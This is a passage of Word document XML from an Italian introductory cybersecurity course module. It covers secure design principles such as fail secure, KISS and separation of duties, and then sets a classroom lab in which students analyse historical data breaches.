          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ❌ se il check si rompe, dai accesso lo stesso</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">is_authorized</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lancia eccezione, l’utente entra.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fail open</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— è il bug peggiore.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Pattern corretto (fail secure)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is_authorized(user, resource):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resource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log.error(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"Auth check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✅ servizio non disponibile, non accesso non autorizzato</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="46"/>
    <w:bookmarkStart w:id="47" w:name="kiss-keep-it-simple-stupid"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.4 KISS — Keep It Simple, Stupid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La complessità è la nemica della sicurezza. Più codice = più bug = più vulnerabilità.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Caso di scuola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Log4Shell. Una libreria di logging che eseguiva codice remoto. Perché logging deve eseguire codice?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Non deve.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Era una feature complessa (interpolazione JNDI) che ha aperto un buco gigantesco.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">In pratica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Meno dipendenze.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Meno feature opzionali abilitate di default.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Meno indirezioni.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Codice leggibile da un altro umano in 5 minuti.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="47"/>
    <w:bookmarkStart w:id="48" w:name="X14cf94760361f85cfc26d0609ba8b90d35616d1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.5 Separation of Duties — Separazione dei Compiti</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nessuna singola persona/componente dovrebbe poter completare un’azione critica da solo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Esempi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Per fare un bonifico &gt; 10000€ servono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">due approvatori</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Chi scrive il codice non è chi fa il deploy in produzione.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Le chiavi di backup sono in un cassaforte separata da quelle di lavoro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In codice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Audit log scritto su un sistema separato (un attaccante che compromette l’app non può cancellare le tracce).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Chiavi di cifratura in un KMS, non nel codice.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="48"/>
    <w:bookmarkStart w:id="49" w:name="riassunto-in-una-pagina"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.6 Riassunto in una pagina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2238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Principio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">In una frase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tipico anti-pattern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Solo ciò che serve</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">App che gira come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Defense in Depth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Più strati indipendenti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">“Abbiamo HTTPS basta”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 Secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Se si rompe, chiude</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Try/except che ignora errori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KISS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Meno è più</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Feature opzionali abilitate di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Separation of Duties</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mai uno solo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Stesso utente DB dev e prod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7 — Lab — Cosa è andato storto?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quanto ci vorrà: 1 ora (20 min preparazione, 30 min lavoro, 10 min discussione).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="49"/>
    <w:bookmarkStart w:id="50" w:name="setup"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.1 Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Coppie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Ogni coppia sceglie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">uno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dei 5 casi visti in cap. 4 (oppure ne propone uno tra: Yahoo 2013-14, OPM 2015, Marriott 2018, Capital One 2019, Twitter 2020 — il docente fornisce link).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="50"/>
    <w:bookmarkStart w:id="51" w:name="consegna"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2 Consegna</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Documento di 1 pagina</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in formato libero (Word/Markdown/PDF) con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5 sezioni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Riassunto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(3-4 righe): cosa è successo, quando, chi è stato colpito.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CIA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: quale proprietà è stata violata? (Anche più di una.)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Tassonomia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: quale categoria di minaccia (cap. 3)?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Principio violato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: quale dei 5 principi (cap. 6) è stato ignorato?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Misura tecnica concreta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che avrebbe evitato (o limitato) l’incidente. Una sola, specifica.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tempo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">30 minuti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. È normale dover cercare un po’ su internet per i dettagli.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="51"/>
    <w:bookmarkStart w:id="52" w:name="discussione-collettiva-10-min"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.3 Discussione collettiva (10 min)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ogni coppia espone in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2 minuti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Qual è il caso scelto.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Quale CIA + tassonomia + principio.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- La misura tecnica.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il docente sintetizza alla lavagna. Quasi sempre emerge che:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Le proprietà violate sono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(data breach + downtime).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Il principio violato è quasi sempre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Defense in Depth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Least Privilege</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Le misure proposte sono spesso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“patching tempestivo”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“segmentazione di rete”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="52"/>
    <w:bookmarkStart w:id="53" w:name="output"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.4 Output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le consegne vanno in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Corso_32h/04_consegne/M1_lab/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Non sono valutate (M1 non ha verifica formale), ma il docente le legge e ne discute con la classe nelle pause di M2.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Prossimo modulo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: M2 — Networking &amp; ISO/OSI (6h). Adesso sai cos’è la cybersecurity. Il prossimo passo è capire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">come funziona la rete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, perché è il primo terreno di gioco di un attaccante.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="53"/>
    <w:bookmarkEnd w:id="54"/>
    <w:bookmarkEnd w:id="55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2026-05-06T22:05:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-06T22:05:50Z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